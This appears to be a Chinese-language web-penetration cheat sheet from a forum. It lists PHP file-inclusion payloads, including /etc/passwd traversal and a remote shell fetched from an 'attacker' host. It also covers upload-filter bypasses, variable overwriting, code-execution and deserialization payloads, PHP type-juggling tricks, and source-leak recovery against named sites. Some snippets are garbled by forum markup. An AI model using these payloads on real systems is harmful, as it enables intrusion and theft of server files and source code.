PHP:include()``include_once()``require()``require_once() fopen() readfile() 等
JSP / Servlet:ava.io.File()``java.io.FileReader()等
ASP:includefile``includevirtual 等
当 PHP 包含一个文件时,会将该文件当做 PHP 代码执行,而不会在意文件时什么类型
<?php
$file = $_GET['file'];
if (file_exists('/home/wwwrun/'.$file.'.php')) {
include '/home/wwwrun/'.$file.'.php';
}
?>
上述代码存在本地文件包含,可用 %00 截断的方式读取 /etc/passwd 文件内容。
%00 截断
file=../../../../../../../../../etc/passwd%00
需要 magic_quotes_gpc=off,PHP 小于 5.3.4 有效。
路径长度截断
file=../../../../../../../../../etc/passwd/././././././.[…]/./././././.
Linux 需要文件名长于 4096,Windows 需要长于 256。
点号截断
file=../../../../../../../../../boot.ini/………[…]…………
只适用 Windows,点号需要长于 256。
远程文件包含,Remote File Inclusion,RFI。
<?php
if ($route == "share") {
require_once $basePath . "/action/m_share.php";
} elseif ($route == "sharelink") {
require_once $basePath . "/action/m_sharelink.php";
}
构造变量 basePath 的值。
/?basePath=http://attacker/phpshell.txt?
最终的代码执行了
require_once "http://attacker/phpshell.txt?/action/m_share.php";
问号后的部分被解释为 URL 的 querystring,这也是一种「截断」。
普通远程文件包含
file=[http|https|ftp]://example.com/shell.txt
需要 allow_url_fopen=On 并且 allow_url_include=On。
利用 PHP 流 input
file=php://input
需要 allow_url_include=On。
利用 PHP 流 filter
file=php://filter/convert.base64-encode/resource=index.php
需要 allow_url_include=On。
利用 data URIs
file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
需要 allow_url_include=On。
利用XSS 执行
file=http://127.0.0.1/path/xss.php?xss=phpcode
需要 allow_url_fopen=On,allow_url_include=On并且防火墙或者白名单不允许访问外网时,先在同站点找一个 XSS 漏洞,包含这个页面,就可以注入恶意代码了。
文件上传
文件上传漏洞是指用户上传了一个可执行脚本文件,并通过此文件获得了执行服器端命令的能力。在大多数情况下,文件上传漏洞一般是指上传 web 脚本能够被服务器解析的问题,也就是所谓的 webshell 问题。完成这一攻击需要这样几个条件,一是上传的文件能够这 web 容器执行,其次用户能从 web 上访问这个文件,最后,如果上传的文件被安全检查、格式化、图片压缩等功能改变了内容,则可能导致攻击失败。
绕过上传检查
前端检查扩展名
抓包绕过即可。
Content-Type 检测文件类型
抓包修改 Content-Type 类型,使其符合白名单规则。
服务端添加后缀
尝试 %00 截断。
服务端扩展名检测
利用解析漏洞。
Apache 解析
phpshell.php.rar.rar.rar.rar 因为 Apache 不认识 .rar 这个文件类型,所以会一直遍历后缀到 .php,然后认为这是一个 PHP 文件。
IIS 解析
IIS 6 下当文件名为 abc.asp;xx.jpg 时,会将其解析为 abc.asp。
PHP CGI 路径解析
当访问http://www.a.com/path/test.jpg/notexist.php 时,会将 test.jpg 当做 PHP 解析,notexist.php是不存在的文件。此时 Nginx 的配置如下
location ~ \.php$ { root html; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name; include fastcgi_param;}
其他方式
后缀大小写、双写、特殊后缀如 php5 等,修改包内容的大小写过 WAF 等。
全局变量覆盖
变量如果未被初始化,且能够用户所控制,那么很可能会导致安全问题。
register_globals=ON
实例
<?php
echo "Register_globals: " . (int)ini_get("register_globals") . "<br/>";
if ($auth) {
echo "private!";
}
?>
当 register_globals=ON 时,提交 test.php?auth=1,auth变量将自动得到赋值。
extract() 变量覆盖
extract() 函数能够将变量从数组导入到当前的符号表,其定义为
int extract ( array $var_array [, int $extract_type [, string $prefix ]] )
其中,第二个参数指定函数将变量导入符号表时的行为,最常见的两个值是 EXTR_OVERWRITE 和 EXTR_SKIP。
当值为 EXTR_OVERWRITE 时,在将变量导入符号表的过程中,如果变量名发生冲突,则覆盖所有变量;值为 EXTR_SKIP 则表示跳过不覆盖。若第二个参数未指定,则在默认情况下使用 EXTR_OVERWRITE。
<?php
$auth = "0";
extract($_GET);
if ($auth == 1) {
echo "private!";
} else {
echo "public!";
}
?>
当 extract() 函数从用户可以控制的数组中导出变量时,可能发生变量覆盖。
import_request_variables 变量覆盖
bool import_request_variables (string $types [, string $prefix])
import_request_variables 将 GET、POST、Cookies 中的变量导入到全局,使用这个函数只用简单地指定类型即可。
<?php
$auth = "0";
import_request_variables("G");
if ($auth == 1) {
echo "private!";
} else {
echo "public!";
}
?>
import_request_variables("G") 指定导入 GET 请求中的变量,提交 test.php?auth=1 出现变量覆盖。
parse_str() 变量覆盖
void parse_str ( string $str [, array &$arr ])
parse_str() 函数通常用于解析 URL 中的 querystring,但是当参数值可以被用户控制时,很可能导致变量覆盖。
// var.php?var=new 变量覆盖$var = [color=var(--theme-color, #42b983)]"init";parse_str($_SERVER[[color=var(--theme-color, #42b983)]"QUERY_STRING"]);print $var;
与 parse_str() 类似的函数还有 mb_parse_str()。
命令执行直接执行代码
PHP 中有不少可以直接执行代码的函数。
eval();assert();system();exec();shell_exec();passthru();escapeshellcmd();pcntl_exec();等
preg_replace() 代码执行
preg_replace() 的第一个参数如果存在 /e 模式修饰符,则允许代码执行。
<?php
$var = "<tag>phpinfo()</tag>";
preg_replace("/<tag>(.*?)<\/tag>/e", "addslashes(\\1)", $var);
?>
如果没有 /e 修饰符,可以尝试 %00 截断。
动态函数执行
用户自定义的函数可以导致代码执行。
<?php
$dyn_func = $_GET["dyn_func"];
$argument = $_GET["argument"];
$dyn_func($argument);
?>
反引号命令执行
<?php
echo `ls -al`;
?>
Curly Syntax
PHP 的 Curly Syntax 也能导致代码执行,它将执行花括号间的代码,并将结果替换回去。
<?php
$var = "aaabbbccc ${`ls`}";
?>
<?php
$foobar = "phpinfo";
${"foobar"}();
?>
回调函数
很多函数都可以执行回调函数,当回调函数用户可控时,将导致代码执行。
<?php
$evil_callback = $_GET["callback"];
$some_array = array(0,1,2,3);
$new_array = array_map($evil_callback, $some_array);
?>
攻击 payload
[AppleScript] 纯文本查看 复制代码
http://www.a.com/index.php?callback=phpinfo
反序列化
如果 unserialize() 在执行时定义了 __destruct() 或 __wakeup() 函数,则有可能导致代码执行。
[PHP] 纯文本查看 复制代码
?
1
2
3
4
5
6
7
8
9
<?php
class Example {
var $var = "";
function __destruct() {
eval($this->$var);
}
}
unserialize($_GET["saved_code"]);
?>
攻击 payload
[AppleScript] 纯文本查看 复制代码
?
1
http://www.a.com/index.php?saved_code=O:7:"Example":1:{s:3:"var";s:10:"phpinfo();";}
PHP 特性
数组
[PHP] 纯文本查看 复制代码
?
1
2
3
4
5
<?php
$var = 1;
$var = array();
$var = "string";
?>
php 不会严格检验传入的变量类型,也可以将变量自由的转换类型。
比如在 $a == $b 的比较中
[PHP] 纯文本查看 复制代码
?
1
2
3
4
$a = null;
$b = false; //为真
$a = '';
$b = 0; //同样为真
然而,PHP 内核的开发者原本是想让程序员借由这种不需要声明的体系,更加高效的开发,所以在几乎所有内置函数以及基本结构中使用了很多松散的比较和转换,防止程序中的变量因为程序员的不规范而频繁的报错,然而这却带来了安全问题。
[PHP] 纯文本查看 复制代码
?
1
2
3
4
0=='0' //true
0 == 'abcdefg' //true
0 === 'abcdefg' //false
1 == '1abcdef' //true
魔法Hash
[PHP] 纯文本查看 复制代码
?
1
2
3
"0e132456789"=="0e7124511451155" //true
"0e123456abc"=="0e1dddada" //false
"0e1abc"=="0" //true
在进行比较运算时,如果遇到了0e\d+这种字符串,就会将这种字符串解析为科学计数法。所以上面例子中 2 个数的值都是 0 因而就相等了。如果不满足0e\d+这种模式就不会相等。
十六进制转换
[PHP] 纯文本查看 复制代码
?
1
2
3
"0x1e240"=="123456" //true
"0x1e240"==123456 //true
"0x1e240"=="1e240" //false
当其中的一个字符串是 0x 开头的时候,PHP 会将此字符串解析成为十进制然后再进行比较,0x1240解析成为十进制就是 123456,所以与 int 类型和 string 类型的 123456 比较都是相等。
类型转换
常见的转换主要就是 int 转换为 string,string转换为 int。
int 转 string:
[PHP] 纯文本查看 复制代码
?
1
2
3
$var = 5;
方式1:$item = (string)$var;
方式2:$item = strval($var);
string 转 int:intval()函数。
对于这个函数,可以先看 2 个例子。
[PHP] 纯文本查看 复制代码
?
1
2
3
var_dump(intval('2')) //2
var_dump(intval('3abcd')) //3
var_dump(intval('abcd')) //0
说明intval()转换的时候,会将从字符串的开始进行转换知道遇到一个非数字的字符。即使出现无法转换的字符串,intval()不会报错而是返回 0。
同时,程序员在编程的时候也不应该使用如下的这段代码:
[PHP] 纯文本查看 复制代码
?
1
2
3
if(intval($a)>1000) {
mysql_query("select * from news where id=".$a)
}
这个时候 $a 的值有可能是 1002 union。
内置函数的参数的松散性
内置函数的松散性说的是,调用函数时给函数传递函数无法接受的参数类型。解释起来有点拗口,还是直接通过实际的例子来说明问题,下面会重点介绍几个这种函数。
md5()
[PHP] 纯文本查看 复制代码
?
1
2
3
4
5
6
$array1[] = array(
"foo" => "bar",
"bar" => "foo",
);
$array2 = array("foo", "bar", "hello", "world");
var_dump(md5($array1)==var_dump($array2)); //true
PHP 手册中的 md5()函数的描述是 string md5 ( string $str [, bool $raw_output = false ] ),md5()中的需要是一个 string 类型的参数。但是当你传递一个 array 时,md5()不会报错,只是会无法正确地求出 array 的 md5 值,这样就会导致任意 2 个 array 的 md5 值都会相等。
strcmp()
strcmp()函数在 PHP 官方手册中的描述是 intstrcmp ( string $str1 , string $str2 ),需要给 strcmp() 传递 2 个 string 类型的参数。如果 str1 小于 str2,返回-1,相等返回 0,否则返回 1。strcmp()函数比较字符串的本质是将两个变量转换为 ASCII,然后进行减法运算,然后根据运算结果来决定返回值。
如果传入给出strcmp()的参数是数字呢?
[PHP] 纯文本查看 复制代码
?
1
$array=[1,2,3];[/align]var_dump(strcmp($array,'123')); //null,在某种意义上null也就是相当于false。
switch()
如果switch()是数字类型的 case 的判断时,switch 会将其中的参数转换为 int 类型。如下:
[PHP] 纯文本查看 复制代码
?
01
02
03
04
05
06
07
08
09
10
$i ="2abc";
switch ($i) {
case 0:
case 1:
case 2:
echo "i is less than 3 but not negative";
break;
case 3:
echo "i is 3";
}
这个时候程序输出的是i is less than 3 but not negative,是由于switch()函数将$i进行了类型转换,转换结果为 2。
in_array()
在 PHP 手册中,in_array()函数的解释是bool in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] ) ,如果strict参数没有提供,那么in_array就会使用松散比较来判断$needle是否在$haystack中。当 strince 的值为 true 时,in_array()会比较 needls 的类型和 haystack 中的类型是否相同。
[PHP] 纯文本查看 复制代码
?
1
2
3
$array=[0,1,2,'3'];
var_dump(in_array('abc', $array)); //true
var_dump(in_array('1bc', $array)); //true
可以看到上面的情况返回的都是 true,因为'abc'会转换为 0,'1bc'转换为 1。
array_search()与in_array()也是一样的问题。
寻找源代码备份
hg 源码泄露
hg init 时会产生 .hg 文件。
利用工具 dvcs-ripper
https://github.com/kost/dvcs-ripper
Git 源码泄露
.git 目录内有代码的变更记录等文件,如果部署时该目录下的文件可被访问,可能会被利用来恢复源代码。
/.git/.git/HEAD/.git/index/.git/config/.git/description
GitHack
https://github.com/lijiejie/GitHack
python GitHack.py
http://www.openssl.org/.git/
.DS_Store 文件泄露
Mac OS 中会包含有 .DS_Store 文件,包含文件名等信息。
利用工具 ds_store_exp
https://github.com/lijiejie/ds_store_exp
[Bash shell] 纯文本查看 复制代码
?
1
python ds_store_exp.py [url]http://hd.zj.qq.com/themes/galaxyw/.DS_Storehd.zj.qq.com/[/url][/align][align=left]
[Bash shell] 纯文本查看 复制代码
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
hd.zj.qq.com/
└── themes
└── galaxyw
├──app
│ └── css
│ └── style.min.css
├── cityData.min.js
├── images
│ └── img
│ ├── bg-hd.png
│ ├── bg-item-activity.png
│ ├── bg-masker-pop.png
│ ├── btn-bm.png
│ ├── btn-login-qq.png
│ ├── btn-login-wx.png
│ ├── ico-add-pic.png
│ ├── ico-address.png
│ ├── ico-bm.png
│ ├── ico-duration-time.png
│ ├── ico-pop-close.png
│ ├── ico-right-top-delete.png
│ ├── page-login-hd.png
│ ├── pic-masker.png
│ └── ticket-selected.png
└── member
├── assets
│ ├── css
│ │ ├── ace-reset.css
│ │ └── antd.css
│ └── lib
│ ├── cityData.min.js
│ └── ueditor
│ ├── index.html
│ ├── lang
│ │ └── zh-cn
│ │ ├── images
│ │ │ ├── copy.png
│ │ │ ├── localimage.png
│ │ │ ├── music.png
│ │ │ └── upload.png
│ │ └── zh-cn.js
│ ├── php
│ │ ├── action_crawler.php
│ │ ├── action_list.php
│ │ ├── action_upload.php
│ │ ├── config.json
│ │ ├── controller.php
│ │ └── Uploader.class.php
│ ├── ueditor.all.js
│ ├── ueditor.all.min.js
│ ├── ueditor.config.js
│ ├── ueditor.parse.js
│ └── ueditor.parse.min.js
└── static
├──css
│ └── page.css
├──img
│├──bg-table-title.png
│├──bg-tab-say.png
│ ├── ico-black-disabled.png
│ ├── ico-black-enabled.png
│ ├── ico-coorption-person.png
│ ├── ico-miss-person.png
│ ├── ico-mr-person.png
│ ├── ico-white-disabled.png
│ └── ico-white-enabled.png
└── scripts
├──js
└──lib
└── jquery.min.js
21 directories, 48 files
网站备份文件
管理员备份网站文件后错误地将备份放在 Web 目录下。
常见的后缀名:
.rar.zip.7z.tar.tar.gz.bak.txt
SVN 泄露
敏感文件:
/.svn/.svn/wc.db/.svn/entries
dvcs-ripper
https://github.com/kost/dvcs-ripper
[Perl] 纯文本查看 复制代码
?
1
perl rip-svn.pl -v -u [url]http://www.example.com/.svn/[/url]
Seay - SVN
网址自行查找。
WEB-INF / web.xml 泄露
WEB-INF 是 Java Web 应用的安全目录,web.xml 中有文件的映射关系。
WEB-INF 主要包含一下文件或目录:
/WEB-INF/web.xml:Web 应用程序配置文件,描述了 servlet 和其他的应用组件配置及命名规则。
/WEB-INF/classes/:含了站点所有用的 class 文件,包括 servlet class 和非 servlet class,他们不能包含在。jar 文件中。
/WEB-INF/lib/:存放 web 应用需要的各种 JAR 文件,放置仅在这个应用中要求使用的 jar 文件,如数据库驱动 jar 文件。
/WEB-INF/src/:源码目录,按照包名结构放置各个 java 文件。
/WEB-INF/database.properties:数据库配置文件。
通过找到 web.xml 文件,推断 class 文件的路径,最后直接 class 文件,在通过反编译 class 文件,得到网站源码。 一般情况,jsp 引擎默认都是禁止访问 WEB-INF 目录的,Nginx 配合 Tomcat 做均衡负载或集群等情况时,问题原因其实很简单,Nginx 不会去考虑配置其他类型引擎(Nginx 不是 jsp 引擎)导致的安全问题而引入到自身的安全规范中来(这样耦合性太高了),修改 Nginx 配置文件禁止访问 WEB-INF 目录就好了:
location ~ ^/WEB-INF/* { deny all; } # 或者return 404; 或者其他!
CVS 泄露
http://url/CVS/Root 返回根信息http://url/CVS/Entries 返回所有文件的结构
取回源码
bk clone http://url/name dir